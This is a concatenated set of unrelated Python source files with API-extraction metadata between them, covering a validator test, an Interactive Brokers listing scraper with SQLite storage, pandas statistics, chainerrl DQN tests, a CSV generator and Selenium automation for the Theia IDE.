"collections.defaultdict",
"fastestimator.util.traceability_util.traceable",
"os.path.exists",
"pandas.DataFrame"
] |
[((958, 969), 'fastestimator.util.traceability_util.traceable', 'traceable', ([], {}), '()\n', (967, 969), False, 'from fastestimator.util.traceability_util import traceable\n'), ((1886, 1903), 'collections.defaultdict', 'defaultdict', (['list'], {}), '(list)\n', (1897, 1903), False, 'from collections import defaultdict\n'), ((2348, 2376), 'pandas.DataFrame', 'pd.DataFrame', ([], {'data': 'self.data'}), '(data=self.data)\n', (2360, 2376), True, 'import pandas as pd\n'), ((2388, 2417), 'os.path.exists', 'os.path.exists', (['self.filename'], {}), '(self.filename)\n', (2402, 2417), False, 'import os\n')]
|
from unittest import TestCase
import trafaret as t
from trafaret_validator import TrafaretValidator
class ValidatorForTest(TrafaretValidator):
t_value = t.Int()
value = 5
class ValidatorForTest2(ValidatorForTest):
test = t.String()
class TestMetaclass(TestCase):
def test_metaclass(self):
self.assertIsInstance(ValidatorForTest._validators, dict,
'Value should be instance of dict')
self.assertIn('t_value', ValidatorForTest._validators,
'Value should be in _validators')
self.assertNotIn('value', ValidatorForTest._validators,
'Value should not be in _validators')
self.assertIsInstance(ValidatorForTest._trafaret, t.Trafaret,
'Value should be instance of Trafaret')
self.assertFalse(ValidatorForTest._data,
'_data should be empty')
self.assertFalse(ValidatorForTest._errors,
'_data should be empty')
def test_inheritance(self):
self.assertIsInstance(ValidatorForTest2._validators, dict,
'Value should be instance of dict')
self.assertIn('t_value', ValidatorForTest2._validators,
'Value should be in _validators')
self.assertIn('test', ValidatorForTest2._validators,
'Value should be in _validators')
self.assertNotIn('value', ValidatorForTest2._validators,
'Value should not be in _validators')
self.assertIsInstance(ValidatorForTest2._trafaret, t.Trafaret,
'Value should be instance of Trafaret')
self.assertFalse(ValidatorForTest2._data,
'_data should be empty')
self.assertFalse(ValidatorForTest2._errors,
'_data should be empty')
|
[
"trafaret.String",
"trafaret.Int"
] |
[((161, 168), 'trafaret.Int', 't.Int', ([], {}), '()\n', (166, 168), True, 'import trafaret as t\n'), ((239, 249), 'trafaret.String', 't.String', ([], {}), '()\n', (247, 249), True, 'import trafaret as t\n')]
|
import sqlite3
import time
from bs4 import BeautifulSoup
from numpy.core import numeric
import requests
import logging
import enlighten
from barbucket.database import DatabaseConnector
from barbucket.tools import GracefulExiter
class ContractsDatabase():
def __init__(self):
pass
def create_contract(self, contract_type_from_listing, exchange_symbol,
broker_symbol, name, currency, exchange):
logging.debug(f"Creating new contract {contract_type_from_listing}_{exchange}_{broker_symbol}_{currency}.")
db_connector = DatabaseConnector()
conn = db_connector.connect()
cur = conn.cursor()
cur.execute("""INSERT INTO contracts (
contract_type_from_listing,
exchange_symbol,
broker_symbol,
name,
currency,
exchange)
VALUES (?, ?, ?, ?, ?, ?)""",(
contract_type_from_listing,
exchange_symbol,
broker_symbol,
name,
currency,
exchange))
conn.commit()
cur.close()
db_connector.disconnect(conn)
def get_contracts(self, filters={}, return_columns=[]):
"""
returns a list of sqlite3.Row objects
"""
# Prepare query to get requested values from db
query = "SELECT * FROM all_contract_info"
if len(return_columns) > 0:
cols = ", ".join(return_columns)
query = query.replace("*", cols)
if len(filters) > 0:
query += " WHERE "
for key, value in filters.items():
if value == "NULL":
query += (key + " IS " + str(value) + " and ")
elif isinstance(value, str):
query += (key + " = '" + str(value) + "' and ")
elif isinstance(value, (int, float)):
query += (key + " = " + str(value) + " and ")
query = query[:-5] #remove trailing 'and'
query += ";"
# Get requested values from db
logging.debug(f"Getting contracts from databse with query: {query}")
db_connector = DatabaseConnector()
conn = db_connector.connect()
conn.row_factory = sqlite3.Row
cur = conn.cursor()
cur.execute(query)
contracts = cur.fetchall()
conn.commit()
cur.close()
db_connector.disconnect(conn)
return contracts
def delete_contract(self, exchange, symbol, currency):
db_connector = DatabaseConnector()
conn = db_connector.connect()
cur = conn.cursor()
cur.execute("""DELETE FROM contracts
WHERE (broker_symbol = ?
AND exchange = ?
AND currency = ?);""",
(symbol,
exchange,
currency))
conn.commit()
cur.close()
db_connector.disconnect(conn)
def delete_contract_id(self, contract_id):
db_connector = DatabaseConnector()
conn = db_connector.connect()
cur = conn.cursor()
cur.execute("""DELETE FROM contracts
WHERE contract_id = ?;""",
contract_id)
conn.commit()
cur.close()
db_connector.disconnect(conn)
class IbExchangeListings():
def __init__(self):
pass
def read_ib_exchange_listing_singlepage(self, ctype, exchange):
url = f"https://www.interactivebrokers.com/en/index.php?f=567"\
+ f"&exch={exchange}"
html = requests.get(url).text
# Correct error from IB
old_lines = html.splitlines()
new_lines = []
corrections = 0
for line in old_lines:
if (' <td align="left" valign="middle">' in line)\
and ("href" not in line):
line = line.replace("</a>","")
corrections += 1
new_lines.append(line)
html = "".join(new_lines)
if corrections == 0:
logging.info(f"IB error for singlepage listings no longer present.")
soup = BeautifulSoup(html, 'html.parser')
tables = soup.find_all('table', \
class_='table table-striped table-bordered')
rows = tables[2].tbody.find_all('tr')
website_data = []
for row in rows:
cols = row.find_all('td')
row_dict = {
'type': ctype,
'broker_symbol': cols[0].text.strip(),
'name': cols[1].text.strip(),
'exchange_symbol': cols[2].text.strip(),
'currency': cols[3].text.strip(),
'exchange': exchange.upper()}
website_data.append(row_dict)
return website_data
def read_ib_exchange_listing_paginated(self, ctype, exchange):
"""
Returns list of contracts
Returns -1 if aborted by user
"""
website_data = []
page = 1
# Setup progress bar
# manager = enlighten.get_manager()
# pbar = manager.counter(total=len(contracts), desc="Contracts", unit="contracts")
exiter = GracefulExiter()
while True:
# Get website
logging.info(f"Scraping IB exchange listing for {exchange}, page {page}.")
url = f"https://www.interactivebrokers.com/en/index.php?f=2222"\
+ f"&exch={exchange}&showcategories=STK&p=&cc=&limit=100"\
+ f"&page={page}"
html = requests.get(url).text
# Correct error from IB
if "(click link for more details)</span></th>\n </th>" in html:
html = html.replace(\
"(click link for more details)</span></th>\n </th>\n",\
"(click link for more details)</span></th>\n")
else:
logging.info(f"IB error for paginated listings no longer present.")
# Parse HTML
soup = BeautifulSoup(html, 'html.parser')
tables = soup.find_all('table', \
class_='table table-striped table-bordered')
rows = tables[2].tbody.find_all('tr')
# Empty table -> End is reached
if rows == []:
return website_data
# Add data from this page to 'website_data'
for row in rows:
cols = row.find_all('td')
row_dict = {
'type': ctype,
'broker_symbol': cols[0].text.strip(),
'name': cols[1].text.strip(),
'exchange_symbol': cols[2].text.strip(),
'currency': cols[3].text.strip(),
'exchange': exchange.upper()}
website_data.append(row_dict)
# Check for abort signal
if exiter.exit():
logging.info(f"Exiting on user request.")
return []
# Prepare for next page
page += 1
time.sleep(3) #show some mercy to webserver
|
[
"barbucket.database.DatabaseConnector",
"logging.debug",
"barbucket.tools.GracefulExiter",
"time.sleep",
"logging.info",
"requests.get",
"bs4.BeautifulSoup"
] |
[((431, 548), 'logging.debug', 'logging.debug', (['f"""Creating new contract {contract_type_from_listing}_{exchange}_{broker_symbol}_{currency}."""'], {}), "(\n f'Creating new contract {contract_type_from_listing}_{exchange}_{broker_symbol}_{currency}.'\n )\n", (444, 548), False, 'import logging\n'), ((562, 581), 'barbucket.database.DatabaseConnector', 'DatabaseConnector', ([], {}), '()\n', (579, 581), False, 'from barbucket.database import DatabaseConnector\n'), ((2085, 2153), 'logging.debug', 'logging.debug', (['f"""Getting contracts from databse with query: {query}"""'], {}), "(f'Getting contracts from databse with query: {query}')\n", (2098, 2153), False, 'import logging\n'), ((2177, 2196), 'barbucket.database.DatabaseConnector', 'DatabaseConnector', ([], {}), '()\n', (2194, 2196), False, 'from barbucket.database import DatabaseConnector\n'), ((2556, 2575), 'barbucket.database.DatabaseConnector', 'DatabaseConnector', ([], {}), '()\n', (2573, 2575), False, 'from barbucket.database import DatabaseConnector\n'), ((3102, 3121), 'barbucket.database.DatabaseConnector', 'DatabaseConnector', ([], {}), '()\n', (3119, 3121), False, 'from barbucket.database import DatabaseConnector\n'), ((4231, 4265), 'bs4.BeautifulSoup', 'BeautifulSoup', (['html', '"""html.parser"""'], {}), "(html, 'html.parser')\n", (4244, 4265), False, 'from bs4 import BeautifulSoup\n'), ((5282, 5298), 'barbucket.tools.GracefulExiter', 'GracefulExiter', ([], {}), '()\n', (5296, 5298), False, 'from barbucket.tools import GracefulExiter\n'), ((3664, 3681), 'requests.get', 'requests.get', (['url'], {}), '(url)\n', (3676, 3681), False, 'import requests\n'), ((4146, 4214), 'logging.info', 'logging.info', (['f"""IB error for singlepage listings no longer present."""'], {}), "(f'IB error for singlepage listings no longer present.')\n", (4158, 4214), False, 'import logging\n'), ((5358, 5432), 'logging.info', 'logging.info', (['f"""Scraping IB exchange listing for {exchange}, page {page}."""'], {}), "(f'Scraping IB exchange listing for {exchange}, page {page}.')\n", (5370, 5432), False, 'import logging\n'), ((6146, 6180), 'bs4.BeautifulSoup', 'BeautifulSoup', (['html', '"""html.parser"""'], {}), "(html, 'html.parser')\n", (6159, 6180), False, 'from bs4 import BeautifulSoup\n'), ((7181, 7194), 'time.sleep', 'time.sleep', (['(3)'], {}), '(3)\n', (7191, 7194), False, 'import time\n'), ((5638, 5655), 'requests.get', 'requests.get', (['url'], {}), '(url)\n', (5650, 5655), False, 'import requests\n'), ((6033, 6100), 'logging.info', 'logging.info', (['f"""IB error for paginated listings no longer present."""'], {}), "(f'IB error for paginated listings no longer present.')\n", (6045, 6100), False, 'import logging\n'), ((7042, 7083), 'logging.info', 'logging.info', (['f"""Exiting on user request."""'], {}), "(f'Exiting on user request.')\n", (7054, 7083), False, 'import logging\n')]
|
import pandas as pd
import numpy as np
from pathlib import Path
from data_params import Data
from data_utils import (
preprocess_train_df,
fit_stats,
transform_stats,
save_transformed_stats,
)
def summarize_stats(csv_name, dir_to_data, stat_name_select):
path_to_input_df = Path(dir_to_data, csv_name)
path_to_output_df = Path(dir_to_data, "funded_" + csv_name)
df = pd.read_csv(path_to_input_df)
df_funded = df.loc[df["STATUS"] == "funded"].drop(columns=["STATUS"])
df_expired = df.loc[df["STATUS"] == "expired"].drop(columns=["STATUS"])
df_funded_described = df_funded.describe(include="all")
df_funded_described
df_expired_described = df_expired.describe(include="all")
df_expired_described
funded_stat = df_funded_described.loc[stat_name_select]
funded_stat = funded_stat.to_frame()
funded_stat.reset_index(level=0, inplace=True)
funded_stat.columns = ["FeatureName", "FeatureValueFunded"]
expired_stat = df_expired_described.loc[stat_name_select]
expired_stat = expired_stat.to_frame()
expired_stat.reset_index(level=0, inplace=True)
expired_stat.columns = ["FeatureName", "FeatureValueExpired"]
funded_stat = funded_stat.merge(expired_stat, on="FeatureName")
funded_stat.to_csv(path_to_output_df, index=False)
return funded_stat
# %% ###########
data_par = Data()
cols_process = data_par.cols_process
cols_output = data_par.cols_output
valid_status = data_par.valid_status
dir_to_saved_data = data_par.dir_to_saved_data
dir_to_query_data = data_par.dir_to_query_data
path_to_training_data = data_par.path_to_training_data
stat_name_select = data_par.stat_name_select
predict = False
csv_name_tags = "stats_tags_df.csv"
csv_name_loanuse = "stats_loanuse_df.csv"
csv_name_desc = "stats_desc_df.csv"
df = pd.read_csv(path_to_training_data, usecols=cols_process)
df = preprocess_train_df(df, valid_status, cols_output, predict)
fit_stats(dir_to_saved_data, df)
stats_tags_df, stats_loanuse_df, stats_desc_df = transform_stats(dir_to_saved_data, df)
save_transformed_stats(dir_to_saved_data, stats_tags_df, csv_name_tags)
save_transformed_stats(dir_to_saved_data, stats_loanuse_df, csv_name_loanuse)
save_transformed_stats(dir_to_saved_data, stats_desc_df, csv_name_desc)
funded_df_tags = summarize_stats(csv_name_tags, dir_to_saved_data, stat_name_select)
funded_df_loanuse = summarize_stats(
csv_name_loanuse, dir_to_saved_data, stat_name_select
)
funded_df_desc = summarize_stats(csv_name_desc, dir_to_saved_data, stat_name_select)
funded_df_tags
funded_df_tags.to_csv(Path(dir_to_saved_data, "funded_df_tags.csv"), index=False)
funded_df_loanuse
funded_df_loanuse.to_csv(Path(dir_to_saved_data, "funded_df_loanuse.csv"), index=False)
funded_df_desc
funded_df_desc.to_csv(Path(dir_to_saved_data, "funded_df_desc.csv"), index=False)
|
[
"data_utils.save_transformed_stats",
"pandas.read_csv",
"data_utils.transform_stats",
"pathlib.Path",
"data_utils.fit_stats",
"data_utils.preprocess_train_df",
"data_params.Data"
] |
[((1374, 1380), 'data_params.Data', 'Data', ([], {}), '()\n', (1378, 1380), False, 'from data_params import Data\n'), ((1822, 1878), 'pandas.read_csv', 'pd.read_csv', (['path_to_training_data'], {'usecols': 'cols_process'}), '(path_to_training_data, usecols=cols_process)\n', (1833, 1878), True, 'import pandas as pd\n'), ((1885, 1944), 'data_utils.preprocess_train_df', 'preprocess_train_df', (['df', 'valid_status', 'cols_output', 'predict'], {}), '(df, valid_status, cols_output, predict)\n', (1904, 1944), False, 'from data_utils import preprocess_train_df, fit_stats, transform_stats, save_transformed_stats\n'), ((1946, 1978), 'data_utils.fit_stats', 'fit_stats', (['dir_to_saved_data', 'df'], {}), '(dir_to_saved_data, df)\n', (1955, 1978), False, 'from data_utils import preprocess_train_df, fit_stats, transform_stats, save_transformed_stats\n'), ((2028, 2066), 'data_utils.transform_stats', 'transform_stats', (['dir_to_saved_data', 'df'], {}), '(dir_to_saved_data, df)\n', (2043, 2066), False, 'from data_utils import preprocess_train_df, fit_stats, transform_stats, save_transformed_stats\n'), ((2067, 2138), 'data_utils.save_transformed_stats', 'save_transformed_stats', (['dir_to_saved_data', 'stats_tags_df', 'csv_name_tags'], {}), '(dir_to_saved_data, stats_tags_df, csv_name_tags)\n', (2089, 2138), False, 'from data_utils import preprocess_train_df, fit_stats, transform_stats, save_transformed_stats\n'), ((2139, 2216), 'data_utils.save_transformed_stats', 'save_transformed_stats', (['dir_to_saved_data', 'stats_loanuse_df', 'csv_name_loanuse'], {}), '(dir_to_saved_data, stats_loanuse_df, csv_name_loanuse)\n', (2161, 2216), False, 'from data_utils import preprocess_train_df, fit_stats, transform_stats, save_transformed_stats\n'), ((2217, 2288), 'data_utils.save_transformed_stats', 'save_transformed_stats', (['dir_to_saved_data', 'stats_desc_df', 'csv_name_desc'], {}), '(dir_to_saved_data, stats_desc_df, csv_name_desc)\n', (2239, 2288), False, 'from data_utils import preprocess_train_df, fit_stats, transform_stats, save_transformed_stats\n'), ((299, 326), 'pathlib.Path', 'Path', (['dir_to_data', 'csv_name'], {}), '(dir_to_data, csv_name)\n', (303, 326), False, 'from pathlib import Path\n'), ((351, 390), 'pathlib.Path', 'Path', (['dir_to_data', "('funded_' + csv_name)"], {}), "(dir_to_data, 'funded_' + csv_name)\n", (355, 390), False, 'from pathlib import Path\n'), ((401, 430), 'pandas.read_csv', 'pd.read_csv', (['path_to_input_df'], {}), '(path_to_input_df)\n', (412, 430), True, 'import pandas as pd\n'), ((2595, 2640), 'pathlib.Path', 'Path', (['dir_to_saved_data', '"""funded_df_tags.csv"""'], {}), "(dir_to_saved_data, 'funded_df_tags.csv')\n", (2599, 2640), False, 'from pathlib import Path\n'), ((2698, 2746), 'pathlib.Path', 'Path', (['dir_to_saved_data', '"""funded_df_loanuse.csv"""'], {}), "(dir_to_saved_data, 'funded_df_loanuse.csv')\n", (2702, 2746), False, 'from pathlib import Path\n'), ((2798, 2843), 'pathlib.Path', 'Path', (['dir_to_saved_data', '"""funded_df_desc.csv"""'], {}), "(dir_to_saved_data, 'funded_df_desc.csv')\n", (2802, 2843), False, 'from pathlib import Path\n')]
|
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from future import standard_library
from builtins import * # NOQA
standard_library.install_aliases() # NOQA
import unittest
from chainer import testing
import numpy as np
import basetest_dqn_like as base
import chainerrl
from chainerrl.agents.dqn import compute_value_loss
from chainerrl.agents.dqn import compute_weighted_value_loss
from chainerrl.agents.dqn import DQN
from basetest_training import _TestBatchTrainingMixin
class TestDQNOnDiscreteABC(
_TestBatchTrainingMixin, base._TestDQNOnDiscreteABC):
def make_dqn_agent(self, env, q_func, opt, explorer, rbuf, gpu):
return DQN(q_func, opt, rbuf, gpu=gpu, gamma=0.9, explorer=explorer,
replay_start_size=100, target_update_interval=100)
class TestDQNOnDiscreteABCBoltzmann(
_TestBatchTrainingMixin, base._TestDQNOnDiscreteABC):
def make_dqn_agent(self, env, q_func, opt, explorer, rbuf, gpu):
explorer = chainerrl.explorers.Boltzmann()
return DQN(q_func, opt, rbuf, gpu=gpu, gamma=0.9, explorer=explorer,
replay_start_size=100, target_update_interval=100)
class TestDQNOnContinuousABC(
_TestBatchTrainingMixin, base._TestDQNOnContinuousABC):
def make_dqn_agent(self, env, q_func, opt, explorer, rbuf, gpu):
return DQN(q_func, opt, rbuf, gpu=gpu, gamma=0.9, explorer=explorer,
replay_start_size=100, target_update_interval=100)
# Batch training with recurrent models is currently not supported
class TestDQNOnDiscretePOABC(base._TestDQNOnDiscretePOABC):
def make_dqn_agent(self, env, q_func, opt, explorer, rbuf, gpu):
return DQN(q_func, opt, rbuf, gpu=gpu, gamma=0.9, explorer=explorer,
replay_start_size=100, target_update_interval=100,
episodic_update=True)
def _huber_loss_1(a):
if abs(a) < 1:
return 0.5 * a ** 2
else:
return abs(a) - 0.5
@testing.parameterize(
*testing.product({
'batch_accumulator': ['mean', 'sum'],
'clip_delta': [True, False],
})
)
class TestComputeValueLoss(unittest.TestCase):
def setUp(self):
self.y = np.asarray([1.0, 2.0, 3.0, 4.0], dtype='f')
self.t = np.asarray([2.1, 2.2, 2.3, 2.4], dtype='f')
if self.clip_delta:
self.gt_losses = np.asarray(
[_huber_loss_1(a) for a in self.y - self.t])
else:
self.gt_losses = np.asarray(
[0.5 * a ** 2 for a in self.y - self.t])
def test_not_weighted(self):
loss = compute_value_loss(
self.y, self.t, clip_delta=self.clip_delta,
batch_accumulator=self.batch_accumulator).array
if self.batch_accumulator == 'mean':
gt_loss = self.gt_losses.mean()
else:
gt_loss = self.gt_losses.sum()
self.assertAlmostEqual(loss, gt_loss, places=5)
def test_uniformly_weighted(self):
# Uniform weights
w1 = np.ones(self.y.size, dtype='f')
loss_w1 = compute_weighted_value_loss(
self.y, self.t, clip_delta=self.clip_delta,
batch_accumulator=self.batch_accumulator,
weights=w1).array
if self.batch_accumulator == 'mean':
gt_loss = self.gt_losses.mean()
else:
gt_loss = self.gt_losses.sum()
self.assertAlmostEqual(loss_w1, gt_loss, places=5)
def test_randomly_weighted(self):
# Random weights
wu = np.random.uniform(low=0, high=2, size=self.y.size).astype('f')
loss_wu = compute_weighted_value_loss(
self.y, self.t, clip_delta=self.clip_delta,
batch_accumulator=self.batch_accumulator,
weights=wu).array
if self.batch_accumulator == 'mean':
gt_loss = (self.gt_losses * wu).mean()
else:
gt_loss = (self.gt_losses * wu).sum()
self.assertAlmostEqual(loss_wu, gt_loss, places=5)
|
[
"chainerrl.agents.dqn.DQN",
"chainerrl.explorers.Boltzmann",
"chainer.testing.product",
"chainerrl.agents.dqn.compute_value_loss",
"numpy.random.uniform",
"future.standard_library.install_aliases",
"numpy.asarray",
"chainerrl.agents.dqn.compute_weighted_value_loss",
"numpy.ones"
] |
[((216, 250), 'future.standard_library.install_aliases', 'standard_library.install_aliases', ([], {}), '()\n', (248, 250), False, 'from future import standard_library\n'), ((756, 872), 'chainerrl.agents.dqn.DQN', 'DQN', (['q_func', 'opt', 'rbuf'], {'gpu': 'gpu', 'gamma': '(0.9)', 'explorer': 'explorer', 'replay_start_size': '(100)', 'target_update_interval': '(100)'}), '(q_func, opt, rbuf, gpu=gpu, gamma=0.9, explorer=explorer,\n replay_start_size=100, target_update_interval=100)\n', (759, 872), False, 'from chainerrl.agents.dqn import DQN\n'), ((1078, 1109), 'chainerrl.explorers.Boltzmann', 'chainerrl.explorers.Boltzmann', ([], {}), '()\n', (1107, 1109), False, 'import chainerrl\n'), ((1125, 1241), 'chainerrl.agents.dqn.DQN', 'DQN', (['q_func', 'opt', 'rbuf'], {'gpu': 'gpu', 'gamma': '(0.9)', 'explorer': 'explorer', 'replay_start_size': '(100)', 'target_update_interval': '(100)'}), '(q_func, opt, rbuf, gpu=gpu, gamma=0.9, explorer=explorer,\n replay_start_size=100, target_update_interval=100)\n', (1128, 1241), False, 'from chainerrl.agents.dqn import DQN\n'), ((1438, 1554), 'chainerrl.agents.dqn.DQN', 'DQN', (['q_func', 'opt', 'rbuf'], {'gpu': 'gpu', 'gamma': '(0.9)', 'explorer': 'explorer', 'replay_start_size': '(100)', 'target_update_interval': '(100)'}), '(q_func, opt, rbuf, gpu=gpu, gamma=0.9, explorer=explorer,\n replay_start_size=100, target_update_interval=100)\n', (1441, 1554), False, 'from chainerrl.agents.dqn import DQN\n'), ((1783, 1921), 'chainerrl.agents.dqn.DQN', 'DQN', (['q_func', 'opt', 'rbuf'], {'gpu': 'gpu', 'gamma': '(0.9)', 'explorer': 'explorer', 'replay_start_size': '(100)', 'target_update_interval': '(100)', 'episodic_update': '(True)'}), '(q_func, opt, rbuf, gpu=gpu, gamma=0.9, explorer=explorer,\n replay_start_size=100, target_update_interval=100, episodic_update=True)\n', (1786, 1921), False, 'from chainerrl.agents.dqn import DQN\n'), ((2291, 2334), 'numpy.asarray', 'np.asarray', (['[1.0, 2.0, 3.0, 4.0]'], {'dtype': '"""f"""'}), "([1.0, 2.0, 3.0, 4.0], dtype='f')\n", (2301, 2334), True, 'import numpy as np\n'), ((2352, 2395), 'numpy.asarray', 'np.asarray', (['[2.1, 2.2, 2.3, 2.4]'], {'dtype': '"""f"""'}), "([2.1, 2.2, 2.3, 2.4], dtype='f')\n", (2362, 2395), True, 'import numpy as np\n'), ((3105, 3136), 'numpy.ones', 'np.ones', (['self.y.size'], {'dtype': '"""f"""'}), "(self.y.size, dtype='f')\n", (3112, 3136), True, 'import numpy as np\n'), ((2095, 2183), 'chainer.testing.product', 'testing.product', (["{'batch_accumulator': ['mean', 'sum'], 'clip_delta': [True, False]}"], {}), "({'batch_accumulator': ['mean', 'sum'], 'clip_delta': [True,\n False]})\n", (2110, 2183), False, 'from chainer import testing\n'), ((2569, 2622), 'numpy.asarray', 'np.asarray', (['[(0.5 * a ** 2) for a in self.y - self.t]'], {}), '([(0.5 * a ** 2) for a in self.y - self.t])\n', (2579, 2622), True, 'import numpy as np\n'), ((2687, 2795), 'chainerrl.agents.dqn.compute_value_loss', 'compute_value_loss', (['self.y', 'self.t'], {'clip_delta': 'self.clip_delta', 'batch_accumulator': 'self.batch_accumulator'}), '(self.y, self.t, clip_delta=self.clip_delta,\n batch_accumulator=self.batch_accumulator)\n', (2705, 2795), False, 'from chainerrl.agents.dqn import compute_value_loss\n'), ((3156, 3285), 'chainerrl.agents.dqn.compute_weighted_value_loss', 'compute_weighted_value_loss', (['self.y', 'self.t'], {'clip_delta': 'self.clip_delta', 'batch_accumulator': 'self.batch_accumulator', 'weights': 'w1'}), '(self.y, self.t, clip_delta=self.clip_delta,\n batch_accumulator=self.batch_accumulator, weights=w1)\n', (3183, 3285), False, 'from chainerrl.agents.dqn import compute_weighted_value_loss\n'), ((3690, 3819), 'chainerrl.agents.dqn.compute_weighted_value_loss', 'compute_weighted_value_loss', (['self.y', 'self.t'], {'clip_delta': 'self.clip_delta', 'batch_accumulator': 'self.batch_accumulator', 'weights': 'wu'}), '(self.y, self.t, clip_delta=self.clip_delta,\n batch_accumulator=self.batch_accumulator, weights=wu)\n', (3717, 3819), False, 'from chainerrl.agents.dqn import compute_weighted_value_loss\n'), ((3608, 3658), 'numpy.random.uniform', 'np.random.uniform', ([], {'low': '(0)', 'high': '(2)', 'size': 'self.y.size'}), '(low=0, high=2, size=self.y.size)\n', (3625, 3658), True, 'import numpy as np\n')]
|
import csv
import os
# execfile("C:\\Users\\YONI\\Documents\\Projects\\degree\\attack detection methods\\anomaly_generator\\dataset_generator.py")
ROW_NUM = 100
path = "C:\\Users\\YONI\\Documents\\anomally_detector\\data_sets\\example\\"
users_num = 100
features_num = 20
directory = "data_sets\\"
if not os.path.exists(directory):
os.makedirs(directory)
users = []
features = []
for i in range(0,users_num):
users.append('user'+str(i))
for i in range(0,features_num):
features.append('feature'+str(i))
for user in users:
with open("data_sets\\"+user+'.csv', 'w') as csvfile:
writer = csv.DictWriter(csvfile, delimiter=',', lineterminator='\n', fieldnames=features)
writer.writeheader()
for i in range(1,ROW_NUM):
featDic = {}
for feature in features:
featDic[feature] = user + '_' + feature + '_' + str(i)
writer.writerow(featDic)
|
[
"os.path.exists",
"os.makedirs",
"csv.DictWriter"
] |
[((310, 335), 'os.path.exists', 'os.path.exists', (['directory'], {}), '(directory)\n', (324, 335), False, 'import os\n'), ((338, 360), 'os.makedirs', 'os.makedirs', (['directory'], {}), '(directory)\n', (349, 360), False, 'import os\n'), ((600, 685), 'csv.DictWriter', 'csv.DictWriter', (['csvfile'], {'delimiter': '""","""', 'lineterminator': '"""\n"""', 'fieldnames': 'features'}), "(csvfile, delimiter=',', lineterminator='\\n', fieldnames=features\n )\n", (614, 685), False, 'import csv\n')]
|
# Copyright (c) 2020 Broadcom.
# The term "Broadcom" refers to Broadcom Inc. and/or its subsidiaries.
#
# This program and the accompanying materials are made
# available under the terms of the Eclipse Public License 2.0
# which is available at https://www.eclipse.org/legal/epl-2.0/
#
# SPDX-License-Identifier: EPL-2.0
#
# Contributors:
# Broadcom, Inc. - initial API and implementation
import json
import os
import pyperclip
from robot.api.deco import keyword
from selenium.common.exceptions import NoSuchElementException, WebDriverException, TimeoutException
from selenium.webdriver import ActionChains
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support import expected_conditions
from selenium.webdriver.support.wait import WebDriverWait
from inc.cfg.env_constants import TEST_FILES_DIR
from inc.exceptions.custom_timeout_exception import CustomTimeoutException
from inc.exceptions.element_not_found_exception import ElementNotFoundException
from inc.exceptions.general_exception import GeneralException
from inc.helpers import highlight
from inc.theia.main_menu import MainMenu
from inc.theia.ui import UI
from lib.common_engine import CommonEngine
from inc.decorators.wait_till_exist import WaitTillExist
from inc.theia import constants, lsp_constants
from lib.monako_editor import MonakoEditor
class FileExplorer(CommonEngine):
def __init__(self, url=None):
super(FileExplorer, self).__init__(url)
def is_file_explorer_visible(self):
panel_state = explorer_state = constants.STATE_HIDDEN
theia_left_panel = self.find_it(UI.get_theia_left_panel_locator())
if constants.THEIA_ELEMENT_COLLAPSED not in theia_left_panel.get_attribute(constants.TYPE_CLASS):
panel_state = constants.STATE_VISIBLE
try:
file_explorer_id_element = self.find_it(UI.get_files_explorer_locator())
explorer_classes = file_explorer_id_element.get_attribute(constants.TYPE_CLASS)
if constants.THEIA_ELEMENT_COLLAPSED not in explorer_classes and \
constants.THEIA_HIDDEN not in explorer_classes:
explorer_state = constants.STATE_VISIBLE
except (NoSuchElementException, ElementNotFoundException):
pass
except Exception:
raise GeneralException(self.get_driver(), call_from=self.is_file_explorer_visible.__name__)
return constants.STATE_HIDDEN not in [panel_state, explorer_state]
def make_sure_debug_button_is_here(self):
theia_locator = UI.get_theia_left_panel_locator()
WebDriverWait(self._driver, constants.DEFAULT_TIMEOUT).until(
expected_conditions.presence_of_element_located(theia_locator)
)
theia_left_panel = self.find_it(theia_locator)
highlight(theia_left_panel)
try:
return self.find_it(UI.get_debug_tab_locator())
except (NoSuchElementException, ElementNotFoundException):
menu = MainMenu(self.get_driver())
menu.invoke_menu_path(constants.Debug)
return self.find_it(UI.get_debug_tab_locator())
@WaitTillExist()
def show_file_explorer(self):
if not self.is_file_explorer_visible():
file_explorer_id_element = self.find_it(UI.get_files_explorer_tab_locator())
self.click_me(file_explorer_id_element)
else:
print("visible?")
@WaitTillExist(timeout=constants.DEFAULT_HUGE_TIMEOUT, interval=10)
def wait_for_theia_loaded(self):
# self.switch_to_theia_frame()
theia_panel_locator = UI.get_theia_left_right_panel_locator()
try:
theia_panel = self.find_it(theia_panel_locator)
highlight(theia_panel)
except ElementNotFoundException:
raise WebDriverException
except Exception:
raise
def show_debug_tab(self):
debug_id_element = self.make_sure_debug_button_is_here()
highlight(debug_id_element)
if not self.current_left_tab(debug_id_element):
self.click_me(debug_id_element)
def start_debug(self):
debug_start_locator = UI.get_debug_start_locator()
WebDriverWait(self._driver, constants.DEFAULT_LONG_TIMEOUT).until(
expected_conditions.presence_of_element_located(debug_start_locator)
)
theia_locator = UI.get_theia_left_panel_locator()
theia_panel = self.find_it(theia_locator)
debug_start_button = self.find_it(debug_start_locator, parent=theia_panel)
highlight(debug_start_button, effect_time=1)
self.click_me(debug_start_button, element_human_name="Start Debug")
debug_thread_locator = UI.get_debug_thread_locator()
WebDriverWait(self._driver, constants.DEFAULT_LONG_TIMEOUT).until(
expected_conditions.presence_of_element_located(debug_thread_locator)
)
editor_obj = self.get_editor_obj()
line_num = editor_obj.get_current_line_num()
return line_num
def debug_step_over(self):
debug_step_over_locator = UI.get_debug_step_over_locator()
WebDriverWait(self._driver, constants.DEFAULT_LONG_TIMEOUT).until(
expected_conditions.presence_of_element_located(debug_step_over_locator)
)
editor_obj = self.get_editor_obj()
editor = editor_obj.get_editor_element()
step_locator = UI.get_debug_top_stack_frame_locator()
step_element = self.find_it(step_locator, parent=editor)
highlight(step_element, effect_time=1)
theia_locator = UI.get_theia_left_panel_locator()
theia_panel = self.find_it(theia_locator)
debug_step_over_button = self.find_it(debug_step_over_locator, parent=theia_panel)
highlight(debug_step_over_button, effect_time=1)
self.click_me(debug_step_over_button, element_human_name="Step Over")
# possible variants after step: determine what to wait here for
# theia-debug-top-stack-frame - exists, theia-debug-top-stack-frame-line - exists and line num increased
# or
# theia-debug-top-stack-frame - exists, theia-debug-top-stack-frame-line - doesn't exist and line num unchanged
try:
WebDriverWait(self._driver, constants.DEFAULT_SHORT_TIMEOUT).until(
expected_conditions.invisibility_of_element_located(step_locator)
)
except TimeoutException:
pass
